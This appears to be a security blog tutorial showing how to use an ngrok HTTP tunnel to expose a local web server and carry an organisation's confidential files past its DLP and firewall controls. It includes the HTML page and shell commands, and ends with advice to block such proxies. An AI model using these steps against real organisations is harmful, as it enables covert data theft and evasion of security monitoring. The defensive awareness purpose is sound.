How to Exfiltrate Organisation DLP (Data Leak Prevention) Security using Ngrok?

In this tutorial I’m going to illustrate Exfiltration of Organisation Security using Ngrok.

• Ngrok is secure introspectable tunnel to localhost.
• It is typically a reverse proxy connection to your localhost.
• Multi Platform tool available for Windows, Linux, MAC & FreeBSD etc.
• It establish the connection without need of NAT (Port Forwarding) on Firewalls & Routers, meaning without knowledge of Network Security Personnel one can exfiltrate the data of any systems and also bypass the Data Leak Prevention of organisation, because it establishes tunnel to localhost so it will be difficult to inspect the data flowing through NG(Next Generation) Firewalls.
• After establishing the connection, the things hosted on your localhost i.e., Web Server, FTP Server, SSH etc can be accessible from Internet through URL generated by Ngrok.
  All the confidential data of organisation can be sent on Internet.

• Well, of course not. It was built for developers to demonstrate their projects deployed on their system to clients in order to remove dependency of Network Security Personnel.
• Without knowledge of NAT you can make your system accessible on Internet depending upon the services allowed i.e., HTTP, HTTPS & SSH etc.
• It is not advisable to permit all services of your system on Internet.
• Bad Actors don’t need use cases they will utilise this genuine tool to exploit the security of organisation & will lead to hacktivism.
• Motivation behind this hacktivism can be revenge, political, social incentives, protest or a desire to embarrass certain organisation or individuals.

1. System which you want to exfiltrate should have Internet connection.

2. If organisations have permitted proxies on their perimeter security appliance i.e., NGFW Fortigate, PaloAlto, Checkpoint, Cisco Firepower or Juniper SRX etc.

In order to use Ngrok for Exfiltration testing follow below mentioned steps. In our case we have taken Linux System to demonstrate.

1. Open Ngrok website by typing URL https://ngrok.com into your web browser.

2. Signup for Free Account & Download Ngrok File as shown in below Image.

3. Start web application server of your system & host web application with files which you want to exfiltrate from your organisation on Internet. In my case I’m using Apache Web Server & created below HTML Page as vishal.html containing File Link for demonstration.

Filename: vishal.html

Code

<html>

<head>

<title>Confidential File of Organisation</title>

</head>

<body>

<div>

<b>Download Files</b></br>

<a href="Confidential File.docx" download>Confidential File</a>

</div>

</body>

</html>

Note: Confidential File.docx file exist in my var/www/html folder. You can also put path of file on remote computers which are accessible in ‘href’.

4. Ensure this web application is accessible on your localhost by surfing ‘localhost/vishal.html’ in your web browser.

5. Obtain AuthToken of Ngrok by navigating to Authenticaton –> Your Authtoken & copy the Authtoken on your Ngrok Account as shown in below Image.

6. Navigate to folder in which you have downloaded Ngrok & then extract zip file using below command

iamvsm@SaraswatiRepository:~$ cd Downloads

iamvsm@SaraswatiRepository:~/Downloads$ unzip ngrok-stable-linux-amd64.zip

After extracting zip file you’ll find ngrok file

7. Run & Authorise Ngrok with your online account to get it working using below command

iamvsm@SaraswatiRepository:~/Downloads$ ./ngrok authtoken 1iS0Gc******o6M7yEauSx

Authtoken
saved to configuration file: /home/iamvsm/.ngrok2/ngrok.yml

Now your system is connected to your Ngrok account & ready to establish the tunnel.

8. We’ll be establishing HTTP Tunnel in Ngrok to make our Web Server available on Internet using below command

iamvsm@SaraswatiRepository:~/Downloads$ ./ngrok http 80

As you can see in above image that the two links (HTTP & HTTPS) are forwarding connection to localhost, means we have successfully exfiltrated the organisation security & these links are accessible from Internet.

You can use any one of these links, in our case we’ll be using HTTPS.

We will open link https://323b7489c716.ngrok.io/vishal.html (As we have hosted Code & Files on vishal.html file) on our other device having different internet connection.

As you can see we have successfully Exfitrated Organisation Security using Ngrok.

It is advisable to block this type of proxies if your organisation is conscious about the Data Security. The Reasons behind successful hacktivity are misconfiguration, lack of security knowledge, lethargic policy implementation & administration.

In my upcoming post I’ll demonstrate to prevent these types of exfiltration.